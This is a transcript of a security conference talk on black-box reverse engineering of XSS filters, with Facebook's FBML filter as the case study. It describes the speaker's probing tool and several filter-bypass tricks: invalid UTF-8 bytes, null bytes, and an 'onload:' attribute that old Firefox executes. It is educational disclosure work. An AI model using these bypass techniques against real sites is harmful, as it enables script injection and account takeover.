This presentation is going to be about web security and cross-site scripting and I realize
that usually these topics are considered to be kind of lame but I'm approaching them
from a reverse engineering perspective and I find the combination between the two areas
of hardcore reverse engineering and very vague cross-site scripting to be kind of interesting
and I'm hoping that by the end of the talk you will agree with me, hopefully.
So we know that while the future might not have the flying cars that we were promised,
there will be web applications and web applications will be a very major part of computing. I'm
sure that virtually everybody here has used web applications and will use them more and
more and will come to depend on them. So web applications are the future of computing or
at least a very major part of it. So where does this put reverse engineers? Well, it
reverse engineering is about the mindset. So you can apply it to any type of application
and web applications are a little bit different but if you approach them as a target that
you need to understand and master, you can get pretty far. The main differences are that
web applications are usually hosted somewhere else commercially and you don't have access
neither to the source code nor to the binaries. So you cannot use the standard disassembler
reverse engineering or debugging techniques. The main technique that you can do, you can
use is black box reversing which basically means sending data, looking at the output
and trying to figure out the internals of the application from that. And I find that
in particularly very interesting because it's kind of different than the traditional reverse
engineering approach. Also, the environment is very different and the tools are very different.
The things that you're looking for are very different but I think it's the mindset that
really matters. So you can learn the new environment, the new tools that doesn't really matter too
much. And in particular in this talk, I'm going to talk about cross site scripting which
is so prevalent and it's such an easy and common mistake to make for web application
developers that I think of it as the strength copy of the web application world. And in
the first part of the talk, I will do a brief introduction to cross site scripting for those
of you who are not familiar with all the details. To prevent cross site scripting, developers
usually utilize cross site scripting filters which is what we're going to be reversing.
And I will demonstrate some techniques that I have for reverse engineering these cross
site scripting filters. So this is how the presentation will proceed. First, I'll present
the problem and I'll give a few examples for why cross site scripting is a really big
deal and why it's getting more and more important because of various developments in web applications
that are happening right now and particularly user generated content and the very loosely
defined web 2.0 thing. Then I'm going to talk about how developers implement cross site
scripting filters, what the different approaches are and what their advantages and disadvantages
are. It's important to understand the implementation of the thing that you're going to be reversing
before you start reversing it so that you have some idea of, so that your guesses are
more educated. Then I'm going to present some approaches for reversing these cross site
scripting filters. I'm going to show you a little tool that I wrote to automate some
of the steps. And finally, I will demonstrate a cross site, a few cross site scripting bugs
in Facebook and I will show how I used my tool against Facebook to reverse engineer
their filter and get some pretty interesting results. So let's start. So you've all heard
about the web 2.0 thing. I've heard many different definitions but the parts that are
particularly relevant to what I'm going to be talking about are the user generated content
which is any content that doesn't come from the creators of the site but it comes from
users, third party services. Part of this is also the mashups, RSS readers. If you have
a web application that works as an RSS reader, it's going to be pulling content from various
untrusted sources and it's going to be displaying it. You also have aggregate, you also have
mashups like the mashup between Craigslist and Google Maps that combine them and showed
available apartments for rent on a map. So perhaps you can trust the, perhaps the developer
of that mashup can trust the stuff that's coming from Google Maps but can they really
trust the data that's coming from Craigslist? Now perhaps there is a way to inject some
code into the mashup application. So because of the web 2.0 development, now we have these
architectures that are very distributed and you have a lot of services that depend on
other services that they do not control and very often they do not understand. And by
that I mean the developers might understand how to use the data coming from Craigslist
but the specific, the specific format of the data, exactly what kind of data is allowed,
what kind of characters are filtered is not precisely defined and it might change over
the lifetime of the application because Craigslist might change their format or might change
their implementation. So I was talking to Dino before the talk about this and he made
a very good analogy to bring it back towards stuff that we're perhaps more familiar with.
The taint analysis, the taint propagation idea, when you look at traditional binary
applications and you're looking at untrusted data, you try to model the flow of that data
and see where it's being used. In web applications, it is pretty hard to trace the flow of that
data because pretty much all of the data is untrusted and it comes from various services
which might be pulling it from other services. So because of the distributed nature, it's
very hard to model the entire system. You can only, you're only looking at one little
front end piece and you don't know exactly where all the tainted data might be coming
from. Also, the data goes through a lot of transformations, different formats, translations,
different encodings. So there are a lot of problems there. And the main point is that
because of this aggregation and the distributed nature of these applications, you have a significantly
increased attack surface compared to the traditional websites that contain nothing but HTML and
you throw it up on GeoCities and there is no real big risk. These new architectures
are a lot more interesting to break.
So let's look at user generated content. This can be, this can take a lot of forms.
It can be text. You have plain text which is a lot of forms that you fill out in the
internet, forums. You have some kind of lightweight markup which some services use. This can be
something like bbcode which is a markup, markup language used in some forums. Wikipedia also
has a, some kind of markup, markup language. Some services are trying to use HTML for this
because their users might be more familiar with it. So blogs allow you to use some tags,
some HTML tags when you do a blog comment. And finally, you have some services that are
attempting to give their users almost the full power of HTML, even JavaScript. And if
you look at the order in which I have these bullets, filtering the bad stuff from the
user generated content gets increasingly harder as you go down. So filtering stuff from plain
text, fairly easy. Filtering stuff when you're allowing users to use all HTML tags and you
can do it in JavaScript. I wouldn't say impossible but it's very, very hard. There are a lot
of subtleties. You also have images, sound, video, even flash. And these have their own,
these have their own problems. Most of the problems there are with images and sound files
or file format vulnerabilities which can be used to exploit the browser, the client that
is looking at them. I'm not going to talk about them in this presentation. I'm going
to focus on cross site scripting and specifically on text based cross site scripting. There
are some interesting things you can do with cross site scripting in Flash but, you know,
I'll leave them for another talk. So sometimes the user generated content turns into attacker
generated content and I have some examples there. We have the Sammy's MySpace worm which
you're probably familiar with. In fact, it ate million people in MySpace. We've had
some Orchid worms including some that were stealing bank information from the users.
There have been attacks against web mail applications. They're a pretty, pretty juicy target. Actually,
Skyline wrote a cross site scripting worm that had the ability to propagate between
Hotmail and Yahoo mail back in 2002. I think this was the stone age of cross site scripting
before people really realized the full potential of what you can do with these bugs. We've
also had bugs in Squirrel mail. There have been some WordPress hacks through cross site
scripting. So all of these services are things that a lot of people use, probably a lot of
you and nobody likes to be hacked. So the threat is there. Let's look at what exactly
cross site scripting is. So this is a very simple case and if you already know all of
this, so please bear with me, the section after this will get a little bit more interesting.
So we have a little app which takes, a little web app which takes the name of the user and
then it prints hello, the user name. And if as a parameter to that app, you give the script
tag which is shown in red, then if the application doesn't do any filtering, it will just output
the same script tag into the HTML code. And when the browser, when the browser displays
that HTML, it will execute the script inside the script tag. Why is this bad? Well, this
is bad because the web security model which was designed a long time before the current
push towards web services, web applications and user generated content. The web security
model assumes that everything that comes from a specific site is safe because it's controlled
by the person who wrote the HTML in notepad. But things don't work like this anymore.
Now we're combining different, different, different types of content on the same web
page. And the same origin policy which is the main part of the web security model says
that a script loaded from a page from one domain does not have access to any other domains,
any other pages loaded from other domains. And the classic example there is if you're
logging into your bank, some other site like you go to slash dot and the code on, the JavaScript
code on slash dot does not have access to anything on the bank site even though it's
in the same browser. Because cross-site scripting allows you to execute our external scripts
on a page that's served from a domain that is not under the attacker control. Cross-site
scripting allows you to subvert the same origin policy. So in the previous example we had
a script that the attacker controls executing on the page where the web application is and
this could be a web banking application or something else that's important. So what can
cross-site scripting do? Once you can execute JavaScript on a page, you can steal all the
data from the page, you can capture all the key strokes on a page, you can capture all
the data that's typed into the forms, you can steal authentication cookies and even,
you know, the most powerful attack is the ability to do arbitrary HTTP requests against
the same domain. And the data coming from these requests is available to the JavaScript.
So the JavaScript can fully impersonate the user who's using the browser. There is no
way for the web application to distinguish between actions taken by the real user and
actions taken by the JavaScript that has been injected into their browser. So if cross-site
scripting is so bad, what can we do to prevent it or what can web developers do to prevent
it? The obvious thing is to just remove all the script tags from the content that you're
taking from the users. However, there are a lot of challenges there. First of all, there
are a lot of HTML, different HTML features that allow scripting. It's not just script
tags, there are many other things. I have another slide where I'll show some examples.
There are also proprietary extensions to HTML. So if you read the HTML standard and just
do everything according to the standard, that's not going to work for Internet Explorer or
Firefox. I think Firefox is, I think Firefox might have some proprietary extensions too.
There is also the problem of invalid HTML. The parsers and browsers are notoriously forgiving
to malformed HTML and they will fix it for you. So if your filter looks at something
and says, oh, this is malformed, so it's not a script tag, the browser might interpret
it as a script tag. And finally, you have browser bugs, not necessarily browser vulnerabilities
but just bugs in the parsers which the person writing the filter needs to be aware of.
So, here are a few examples of different ways you can inject scripts into websites. You
can use a script tag with a source attribute. You can use a script tag with a JavaScript
embedded inside the tag. You can use event handler attributes like the onload attribute
and the JavaScript contained in the attribute will be executed. You can also use style sheets.
There are a couple of different ways for style sheets to execute JavaScript. This is just
one of them. And finally, you can use URLs. If you use a JavaScript calling URL in an
image source, I think Firefox and IE fix that so you can no longer do it with images but
you can do it with other types of elements. So, all of these things are features that
you need to take care of in your filter. You need to be aware of their existence. And these
are the simple ones because they're standard. Any HTML, anybody who knows HTML would probably
be familiar with them. But there are a lot of other weird ones. For example, IE supports
these things called XML data islands which basically allow you to put a reference to
an XML file or even embed the XML inside the web page and then refer to that XML in a different
element like a span element. So, in this case, you don't have any script tags on the actual
website but any scripts in that XML file will be executed as if they were on the same page.
You also have Netscape 4, an extension that allowed you to put JavaScript in any attribute.
These, this was removed in Firefox so it's no longer there. But you also have conditional
comments. So, if you write a, if you write an XSS filter that assumes that all comments
are safe and you just let it, let them through, an attacker can use this code to cross site
script you. This is conditional comment which Internet Explorer interprets and it says if
this page is being displayed in an Internet Explorer browser with a version greater than
four, greater or equal to four, then interpret the contents of the comment as HTML. So, even
if you handle all the proprietary extensions, you still have problems with the browser parsers
and this is one very funny example. It shows five different ways you can bypass filters
if they assume that, if they don't handle, if they don't parse the HTML the same way
the browser does. So, here we have an extra, an extra less than sign before the opening
tag. We have a null byte inside the tag name. This is interesting. In Internet Explorer,
you can put null bytes anywhere in the HTML as many as you want and they just get completely
ignored. So, you can use them to break up the name of the tag. You can also use a forward
slash as a separator between the tag and an attribute instead of whitespace. You don't
need quotes around the attribute value. You don't need a greater than sign when you close
the tag. So, your XSS filter needs to be aware of all these things and it needs to, it needs
to duplicate the behavior of the browser but the behavior of the browsers when dealing
with malformed HTML is not documented anywhere and it differs between not only different
browsers but also different versions of the same browser. So, for example, Internet Explorer
will interpret this script tag as the script tag shown below. Firefox will not, I think
because of the null byte but if you remove the null byte, it will work in Firefox too.
And finally, you have just things that are just bugs in the browsers and here are two
examples and you should pay attention to these examples because these two particular things
will come up in a later slide.
So the first bug, the first bug I'm going to talk about is invalid UTF-8 handling. So,
in UTF-8, unlike ASCII, you have multi-byte characters and the first byte in a multi-byte
character determines how many bytes constitute the character. So, the C0 byte that I have
there in the HTML says this is a two-byte character but because of the particulars of
the UTF-8 encoding, C0 is not actually a valid first byte. So, when Firefox and IE7 interpret
this HTML, they look, they reach the C0 byte and then they say, oh, this is an invalid
character and they replace it with a question mark. Basically, if you do view source in
Firefox on this HTML, you'll see a question mark where that, well, where that character
used to be. And they replace the first byte with a question mark and then they continue.
So they will interpret this element as having two attributes, foo and bar and they're shown
on the slide there. IE6, however, will parse this two-byte character and it will see that
it's two bytes. So, it will skip over the second byte and it eats the, this allows you
to eat the closing quote of the attribute because both the C0 byte and the quote byte
that follows will be replaced with a question mark. So, if you can inject a C0 byte inside
an attribute, that C0 byte will eat the next quote and you'll see that Intranet Explorer
6 will interpret this, interpret this element as having two attributes, the second one of
which is an onload attribute which allows you to execute JavaScript. So, if you're
writing an XSS filter, you need to, you need to decide how you're going to handle invalid
UTF-8 sequences. Do you handle them like Firefox does or do you handle them like IE6 does?
And both ways are, both ways have the potential of breaking the other browser. So, you need
to make sure that you remove the UTF-8, the invalid UTF-8 sequences before you even start
parsing. And if you, if you don't think of this and a lot of web developers just don't
know that this thing even exists. So, if you don't, if you're not aware of it, you're
probably going to write a, you're probably going to write an XSS filter that just lets
C0 bytes through and then you'll be vulnerable to this bug. There is another interesting
case in Firefox versions before 2002. The parser had a bug where it treated a number
of weird characters as white space when parsing attributes. So, if you have this HTML and
you have an onload attribute followed by all these, all these characters, Firefox will
see this as an onload attribute followed by a bunch of white space and then equal sign
and then the JavaScript code. If you're writing an XSS filter and you want to remove
onload attributes, you might parse this as, if your regular expression for finding attribute
names allows anything that's not a, anything that's not a space, then you might interpret
some of these characters as part of the attribute name and then the attribute name will not
match onload and you will not remove it. You will let it through and Firefox will execute
the script.
So, writing cross-site scripting filters is pretty hard. You have to be aware of all these
things. There are some good ones out there but a lot of the, there are a lot of cross-site
scripting filters that are not good at all. When we were reversing, so I hope I didn't
bore you too much with this section. We'll get to the reversing part in a little bit.
One important thing to note, to understand when you're reversing something is to understand
how it's actually designed and how it's written. Like you need to know how you would
write this type of program so that you can understand what the developer was thinking
when they were writing the program. This is why I'm going to show you the different ways
you can write XSS filters.
And the first way which used to be pretty common but it's not very good at all is
to just use regular expressions to remove bad stuff from HTML code. So this regular
expression removes the script tag. There are countless ways you can bypass these types
of filters. The most fun one is to use the filter against itself. It's the third bullet
there. If you have a script inside another script then if the filter runs only once,
it will remove the first script, the first script string and then the two parts around
it will come together and form a real script tag which will then get sent to the browser.
There's also a lot of problems with the invalid HTML, different encoding issues, attribute
values can be encoded in like many different ways. So your regular expression very quickly,
your regular expressions very quickly get very, very complicated. And these filters,
I'm not really going to talk about reversing these types of filters just because they're
too trivial. Here is a better way to do cross-site scripting filters and most of the good sites
use this approach. You take the HTML and you actually parse it and you build an in-memory
representation of the HTML tree. So for example, when we parse this, the filter will build
this tree representation with a body tag that has an unload attribute that has an alert
string for its value and then you have a script tag, a p tag. This allows you to very clearly
distinguish between what is a tag, what is an attribute name, what is a value. The main
benefit of this approach is that you can do canonicalization which means that you would
parse the input, you would build this memory representation, then you would apply your
XSS filters and you would apply them on the tree. So if the XSS filter says remove all
unload attributes, you don't need to use regular expressions to find the attributes
because your parser has already extracted all the attributes in the tree representation.
So you can just walk the tree and remove the things that you don't like. Then you output
the tree, you write it out based on the in-memory representation. So this solves the Firefox
problem to an extent because it will remove all the weird white space, all attributes
will be outputted in a canonical form, attribute name, equal sign, quote and then the attribute
value and the canonicalization also makes sure to escape all the character, all the
special characters properly, close all tags, they're not closed. So by being very careful
about how you do the output, you can ensure that the browser will, when parsing that output
will interpret it in the exact same way that your filter interpreted it and this is a much
safer way to do cross-site scripting filtering.
The final point I'm going to make about the different implementations is about whitelisting
versus blacklisting. Most people usually do blacklisting at first and then they discover
that there is this other HTML thing that I didn't think of and I need to add it to the
blacklist. They'll add it to the blacklist and then it will be another one and then the
next version of some browser will come out and it will support some element called, you
know, foo script which allows you to do scripting as well and if that element was not on your
blacklist, now you're vulnerable again. So a much safer way is to use whitelisting where
you only allow the elements and their attributes that you know that are safe. The only, and
if you do a good job of this, the filter will be very solid unless some browser comes out
and changes the meaning of some attribute. This happened with style sheets, CSS. Initially,
CSS did not have support for executing JavaScript so it was safe to have, to allow style attributes
in your HTML. But browsers added the, added the support for JavaScript and CSS so now
this was another thing that you have to, that you have to filter. Oh, and CSS filtering
is also kind of, to do CSS filtering, perhaps you don't want to remove all the style sheets,
you want to, you also, you only want to remove the ones that contain JavaScript. So now,
in addition to your HTML parser, you have to write a CSS parser and the CSS parsers
have the exact same problems that I presented earlier. You have browser incompatibilities,
browsers accept invalid, malformed CSS and fix it up. So it's the same thing all over
again. And the proper approach to doing filtering on CSS is to build a tree again, filter it
and then output it in canonicalized form. I'm not going to talk about CSS in this talk.
I just wanted to make the point that, you know, sometimes even if you think that you
have everything covered, the browser vendors will come up with something new that you have
to add. So now that we understand how cross-site scripting filters are developed, we need to
look at how to reverse them. Reversing cross-site scripting filters is kind of different because
you don't actually have the source code to, well, in most, for most interesting web apps.
You don't have the source code, you don't have the binaries. The web app is running
somewhere in the cloud. You don't even know where it is. One thing that you could do against
these kinds of apps is fuzz them. But fuzzing remote web apps is limited by how much bandwidth
you have. It's also limited by the latency. And also if you start sending like gigabytes
and gigabytes of data to a web app, you know, maybe they'll notice and they'll shut you
down, they'll ban you. We're presuming that they don't want you to reverse this. If they
did, then they'll probably give you the binaries. So if we cannot do full-scale fuzzing with
a lot of randomness, then we need to do something smarter. And what we can do is the blank box
reversing approach where you're sending, you craft some kind of input, some kind of
HTML that's perhaps malformed in different ways. And then you send it to the cross-site
scripting filter and you look at the output from that and you see how the cross-site script,
how the XSS filter modified your input. And based on the different modifications, you
start to figure out how this, how the filter actually operates. For example, one good way
to determine whether the cross-site scripting filter uses stream parsing which is similar
to the string matching filters versus building a tree in memory tree representation is to
look for places where the cross-site scripting filter would change something, will change
some tag based on the contents of the tag or some other tags that occur later in the
stream. If you have a case like this, it means that the filter must have a full tree or a
more or less complete tree somewhere in memory to walk. It cannot do it based. It is not
just looking at the characters that came before the current point. So it is not a stream filter.
So I think this is probably the most important slide in the presentation. This is the main
point that I wanted to make. The approach that I've taken to reversing these cross-site
scripting filters is based on the following algorithm. So first, you guess how the filter
would work. You know, you just make an educated guess, very basic. Then you start generating
test cases and you inspect the result. Based on that result, you update your model. So
if you notice that some elements are not, some elements are not allowed, then perhaps
this is a blacklisting filter. So you update your mental model of the filter to include
the code to remove elements from the blacklist. You can send test cases to see if it's a
blacklisting or whitelisting filter. If it removes, if you put an element called foo,
which is not a valid HTML element and that element goes through, then the filter most
likely is a blacklisting filter because a whitelisting filter would only allow known
elements and foo is not a known element. So you do this, you do this, you use this iterative
approach to update the, to update the model as you learn more based on your test cases.
This model can be, this model can be a mental model, you know, just in your head. It could
be a, it could be a text file where you just write some notes. It could actually be pseudo-code.
You could even implement the, implement the model in real code if you want to be really
thorough. And one interesting thing is that if you implement the model, you'll have a
local duplicate of the filter and then you can do perhaps some, to confirm that your
local implementation of the filter is the same as the remote one, you can do some fuzzing
where you just send random, random input to both filters and make sure that their output
matches.
So let me give you a little example of exactly what kind of test case you would send and
what you would learn from that test case to update your model. This is, this is some Ruby
code that goes through all bytes from 1 to 256, 255. And it iterates, it iterates through
these bytes and it mutates a piece of HTML. So the X, the part that's shown in red there
will be replaced with each value of the byte. So we're going to have a lot of P elements
that have this attribute A and then before the attribute A, you're going to have some,
you're going to have a random byte. So this allows you to, this allows you to test the
behavior of the parser and find out what the parser considers white space between a tag
name and an attribute name, what the parser considers a valid attribute, attribute character.
And to give you a real example of this, I have some, I have some output here. I hope
you can see it. I tried to make the font big enough. So what we have here is all of these
bytes from 1 to 255 and first we have the number of the byte and then we have the output
from the filter and this is actually the Facebook filter. So we're going to learn how the Facebook
parser parses attributes. You can see that a lot of these, a lot of these bytes result
in the attribute being completely removed and this is because the parser treats these
bytes as something that's an invalid. It's neither white space, it's neither part of
the attribute name. So it's some kind of broken HTML and it just ignores the, ignores the
attribute that follows. You have some bytes like the tab character, the vertical tab character,
the tab character, also the new line characters down here. These, these bytes are treated
as white space by the parser and you see that we get an A attribute in the output. Also
one interesting thing is that the character between the P tag and the attribute name is
always a space and this tells us that the Facebook filter is using canonicalization.
It builds an in memory representation and then it outputs it and it always outputs a
single space between tag names and attributes. We don't see the new line characters or vertical
tab there. So as we go, as we go through this, you know, here's another, here's another
white space character, it's the, that's the space. Also for some reason 22, that's
a double quote. For some reason double quote and single quote and forward slash are also
counted as white space in this, in this particular place and in the parser. We can also see if
we scroll down, we're also going to find some characters that are being treated as
part of the attribute name. These are 0 through 9, also the colon character and I believe
this is because of XML namespaces. The format there is the namespace name colon the attribute
name. The interesting part here is that Facebook does not actually validate that you have a
namespace name followed by colon. So you can have the colon as the first, as the first
character in the attribute and you should also remember this because it will come up
later.
So based on this, based on this, based on these results from like a single test case,
based on these results from a single test case, we learned that the white space, that
these characters are treated as white space and that these characters are valid attribute,
are valid attribute names. So to actually do this on a larger scale, I wrote a little
tool called refilter and it's not actually, the slide says a framework but it's not actually
a framework. It's, I wrote it specifically for Facebook. It could be extended to handle
other sites as well. It has sort of a modular architecture although it's a pretty small
script so architecture is perhaps a pretty big word for this. But it has these modules
that are supposed to abstract the application specific functionality. So it has a generic
send test case method and get results method and you can build different modules for different
web apps that implement the specifics of exactly how do you send the test case, where do you
put it in the HTML request, what the URLs are for the request. I also have modules that
implement different tests and this previous example was actually taken from one of the
tests. These modules contain a bunch of test generator functions that just generate the
data that we're going to send as this test case. The nice thing about refilter is that
you have, I mean, I've done this manually as well with just a browser but refilter gives
you the ability to replicate your results in point because you have all of your tests,
all of your test generators are in the code and you can run them repeatedly automatically.
So, and the output from the test cases is stored on the disk in like an output results
directory. So a nice thing about this is that you can run all the tests, get the results
from them and then if you find a bug, I actually did this, I found a bug, I reported it to
Facebook, they fixed it and after they fixed it, I ran my tests again and it was just a
single line, I told refilter just run all tests. It ran all tests and then I had two
results directories and I just diffed the two directories to see what changed in the
Facebook filters and I found the changes that they had made to fix the vulnerability I reported
and then it took me about an hour to break it because their patch wasn't complete.
There was another place where you can do the same thing that they did not fix but, you
know, that's how it always is. So what do you do when you have the model of the filter?
This is the more academic part. Once you have this model, you can build a grammar out of
it. And this is pure speculation, I have not actually done this but I've done it sort
of informally in my head but you could actually build a formal grammar for the output that
this filter produces, all the possible variations. Once you have that grammar, you can do the
same for the browser and you can build a grammar of all valid ways of all HTML that can do
scripting that the browser accepts. And you can do this by either reading the source codes
of the browser or reversing it or you can do some kind of fuzzing or you can apply the
same test case, you can apply the same iterative model generation approach that I presented
to figuring out all the different things that the browser accepts. Perhaps you can even
automate, this is an interesting topic for the research, perhaps you can automate the
generation of the grammar in some kind of BNF form from like a black box parser. This
would be a pretty useful tool to have. Once you have the two grammars, you need to find
a valid sentence in both grammars that contains a script tag and if you do, you have a cross
side scripting vulnerability. Of course, this, you can look for all the other ways to run
scripts as well. This steps, this step can perhaps be automated as well. It will make
a pretty nice research project for some kid in school. So, if there are any students here
who are interested in working on this, let me know. If you're not the academic type
and you like quick results, you can actually implement the model and then you can fuzz
it. And because the model will be running, the filter will be running locally, you can
fuzz it up very quickly, you can throw like billions of random test cases of that and
perhaps you will find some vulnerability in it, some way to bypass the filter.
So let me give you a real example of how this works and I'm also going to show you the
refilter script. But before we get to that, let's talk about Facebook. Facebook is,
Facebook was the reason I, Facebook was the first target that I picked when I decided
to play with this. Facebook is a social network application, you get a social network platform,
you get a, you get a profile there and you can send messages to your friends, you can
post stupid pictures. One interesting thing about Facebook is, and I think they're probably
the first social network to do this is they, they tried to turn their site into a platform
for application development. So you can build third party applications that integrate with
Facebook. And what these applications can do is the following. They can build special
app, they can build specific application pages which are hosted in the apps.facebook.com
domain and each application has its own page there. And these pages can show whatever content
the application needs to show. One of the apps that I use on Facebook is the chess app
which lets you play chess against other people on Facebook and its application page just
shows you a chess board and all the current games that you have. In addition to the application
pages which are sort of separate from the main Facebook, they're not integrated completely.
Applications can put content in user profiles. So if you've ever seen a Facebook profile,
you probably saw a bunch of stupid boxes in the profile for like the vampires versus zombies
game or a little map that shows you the places where that person has traveled around the
world with like little pins. Most of the apps are pretty, pretty, pretty stupid but that
doesn't make them, that doesn't make the platform any less interesting for our reverse.
So applications have the ability to add content to user profiles. So if you want to do a,
if you want to do a worm, perhaps adding content to the user profiles and finding a cross site
scripting bug in that functionality would be the way to go because then everybody who
looks at the profile will get infected by the worm. Also another way for propagating
these things would be through message and wall post attachments. Facebook allows you
to attach almost arbitrary HTML to messages that you send to other Facebook users and
again they rely on their cross site scripting filter to ensure that these attachments don't
contain anything bad. The way they do this is by defining something called FBML which
is a subset of HTML. It's almost a complete subset actually. They support almost all the
tags. This is the application developers write their pages and the content that they want
to display to the users in this FBML markup. It looks almost exactly like HTML and it has
some custom tags. For example, there is a custom tag that's supposed to be the name
of the currently logged in user, the user who's looking at your app. So if you put
this tag there, Facebook will automatically replace it with the name of the user who's
looking at the page. So it allows you to do some kind of dynamic programming. It has style
sheet support. It also has support for scripting which is kind of neat. You can actually run
JavaScript inside FBML and they have a pretty ingenious way to sandbox the JavaScript and
it's actually pretty clever. I'm not going to go into it right now because time is, the
end of the talk is coming up. But if you want to find out more about the JavaScript sandboxing,
you can ask me after the talk. So Facebook is one of the examples of sites that allow
almost unrestricted HTML and JavaScript and their cross site scripting filter needs to
be very, very good to block everything. So I wanted to find out how good it is. This
is the typical architecture for a Facebook app. You have the browser and the browser
requests an application page from the apps.facebook.com domain. Then apps.facebook.com serves as a
proxy and it requests that page from the site of the developer. For example, funapp.example.com.
Then the third party site does whatever it needs to do. For example, the chess application
reads the database and show you, it shows you the current chess board and it does this
using FBML and it returns the FBML content to apps.facebook.com. Then Facebook ensures
that FBML is well formed, does not contain any bad stuff, does XSS filtering and then
sends this back to the browser. So if there are any ways to bypass the cross site scripting
filter there, the third party application can exploit the browser of the user who's
using it. So I used the refilter script and my script writes the test cases in a file
in a directory that's shared with Apache and then I have that IP address configured
as a Facebook application. And then refilter makes the client request to Facebook to get
that, to get that application page. So refilter, in a way, the machine where refilter is running
acts both as the server for the FBML and as the client that reads the HTML. So this is
how you can do the full cycle and you can send the test case and then read the result.
And what I found out through the testing is that Facebook does use the DOM parser. It
builds an in-memory representation of the parsing tree. It fixes invalid input, canonicalizes
everything that it outputs and it uses a white list for tags. So it only allows tags that
are known to be safe but a black list of attributes. So if you can find some way to confuse the
parser and build an attribute that the XSS filter allows but the browser will interpret
as a, some kind of scripting attribute, then you have a cross-site scripting vulnerability.
So let me show you, let me show you the refilter. Let me show you the refilter script, just
a few quick examples. I have only two more slides so I'll be done shortly. This is the
main script. Sorry if you can't read it very well in the back. The script basically consists
of a loop that goes through all of the tests and then it says running test and then it
calls, it calls, I have a Facebook, this is the Facebook module. So I create a new instance
of that and I send the test data here and then I read the result and then I check for
our Facebook errors and then I sleep for a second to not hammer the servers and then
I just iterate through that repeatedly. I mean, code is not really interesting at all.
Here's what the, here's what the Facebook specific module looks like. It has, it has
functions for sending the, sending the HTML request, reading the response, parsing it
to extract the actual data that you're interested in. Again, not very interesting code but this
is probably more entertaining. This is the test module that contains the test generation
functions and here's the, here's the one that I showed earlier on the slides. It just
iterates through all these bytes from 1 to 255 and then it prints them, it prints them
out and it sends this as the, as the data. I have a lot more tests and I'm going to,
I'm releasing this so you can look at it later at the release here but it just tests
various, various aspects of the parser and then based on the results you can, you can
figure out what the parser did and the results are stored in this results directory and here
you have the names in unreadable blue. You have the names of all test cases. So we have
HTML tag open which is one of the test cases and we have the input. So this is the input
that we're sending to Facebook and you can see that we're iterating through a number
of characters to see how they affect the parsing and then we have the output which is what
Facebook returned and based on this we can figure out how the parser works and then we
also have an error page which contains errors that the Facebook parser displays. So these
are interesting for gaining some understanding of it but it's not really required. You
can do this just with the input and the output.
So remember the two, remember the two browser bugs that I talked about earlier, the UTF-8
invalid sequences and the Firefox attribute name bug. These are the two bugs that I'm
going to show. Facebook was vulnerable to the UTF-8 bug because its parser seems to
treat everything as just ASCII or byte streams internally but they were serving the output
with a content encoding set to UTF-8. So you could inject a C0 byte inside an image tag
and Facebook would just output this and then Internet Explorer 6 would parse this as a
tag with an unload attribute and then it will execute the JavaScript. So I reported this
to Facebook in February and they fixed it and the first time they fixed it, they did
the UTF-8. They did proper UTF-8 parsing only inside attribute names, sorry, attribute values
because this was the test, this was the example that I gave them. So after they told me that
it was fixed, I did some more testing and I found out that you can do the same thing
with invalid UTF sequences inside just normal text outside of an attribute. So I told them
to fix it again. It took them about a month to finally fix that which is still much, much
faster than the typical response time you get from somebody like Microsoft. So perhaps
web services do have some advantage although I think it should be faster than a month but
this is how long it took. And this is the more fun one, it's still not fixed. I'm
actually publicly disclosing it right here for the first time. It doesn't really affect
any real users because it only affects Firefox versions less than 2002. So you're probably
not going to see a worm based on this or anything more interesting. But it's a good example
for a Facebook bug. So when I described the Facebook parser for attribute names, I made
a point of the colon being a valid attribute name character. So when the Facebook filter
parses this HTML, it will see this as a onload colon attribute. And onload colon because they
use white black listing for attributes, onload colon does not match anything that's on the
white list, sorry, black list. Only onload is on the black list. So they will let this
attribute through and they will print it out. When the Firefox browser parses this, it will
see it as a onload attribute and then it will execute the JavaScript that's inside it. So
let's get to the fun part. I have, yes, there. Let's see if I can make the font a little bit
better. Yeah. So this is Facebook and this is the, this is an application that I wrote.
It's called Zuckerbug. It's at apps, facebook.com slash Zuckerbug and it has a little table
with all the bugs that I found and all three of them. And it has test cases. So the first
two are fixed. So we're not going to look at them but the third one is the one I just
described. And when I click on test, we get a JavaScript alert that tells us that we have
XSS and the domain is facebook.com. I didn't have enough time to make it do anything more
flashy but once you can execute JavaScript and Facebook, you can do whatever you want.
And if you want to look at the source for this, where is the, there. If you want to
look at the source for this, this is the Facebook page and our content is right here. Sorry,
it's really hard to work with it because I can only see it on that screen. But we have
an image tag that loads this, this, this image and then we have a unload colon equals attribute
that evaluates this JavaScript statement and this is what shows the alert. So in conclusion,
there are a lot of problems with the Web 2.0 sites and the general architecture there.
The reasons for these problems are first, the web security model which was designed
for, which was designed with the assumption that sites only contain safe content that
was put there by the creator of the site. They did not anticipate having third party
data, dynamic data, user contributed content. There is no, there is no way to combine data
from different, data with different trust levels on the same page. There are some proposals
for adding this in the future version of HTML but at this point, if you add, if you combine
two types of data on the same page, they will have full access to each other and also full
access to everything else in the same domain. So there's no way to sort of sandbox HTML
content and that's why we have to do this type of, this kind of XSS filtering which
sometimes fails as we saw.
Another problem is that the security of the system, you cannot really talk about security
of a website in isolation because it depends on the interaction between the website and
the client. And if the behavior of the client changes perhaps because of a new browser release
or because of some undocumented feature or behavior of the browser that the creators
of the sites did not anticipate, the security of the whole thing could be impacted. And
the final reason I think for these significant problems is the programming languages that
we use. And I want to make an analogy with C and string copy. So C does not have a native
string type. However, it turned out that strings are pretty useful in programming and pretty
much any program has to, every program has to deal with them. So people started simulating
the string type using arrays of characters, using different approaches and a lot of people
wrote their own string implementation, string implementations, string libraries and a lot
of these, a lot of these implementations were just unsafe. For example, if C had a native,
if C had a native string type that was similar to the one in Pascal that had the length of
the string in the beginning, then a lot of, all of the string copy vulnerabilities that
we've seen over the last 20 years would just not exist. Similarly, in the web world,
we have a mismatch between what the programming languages provide and what the developers
actually deal with as data. The way most of these, the way most of these websites are
created is by string concatenation. So even though the developers are dealing with HTML
and are manipulating HTML, these languages don't provide a native HTML or XML data
type. You have to, you have to write your own implementation, your own parsers, your
own validators and there are a lot of ways in which you can, you can get this wrong.
If we had a programming language that supported this natively and perhaps did not even have
strings at all to force the developers to use the proper approach, then I think the
incidence of these cross-site scripting bugs would drop dramatically. And finally, you
know, this talk was not just about web security, it was also about black box reversing and
this is recon after all. I find web application reversing kind of exciting because it's
different, sort of challenging. We're at the point where we need much better tools,
automation, so there's still, there's still the possibility of creating something new
and coming up with like a cool new tool that does something interesting. So I think it
will be a pretty interesting topic to pursue in the future. So this is all and if you have
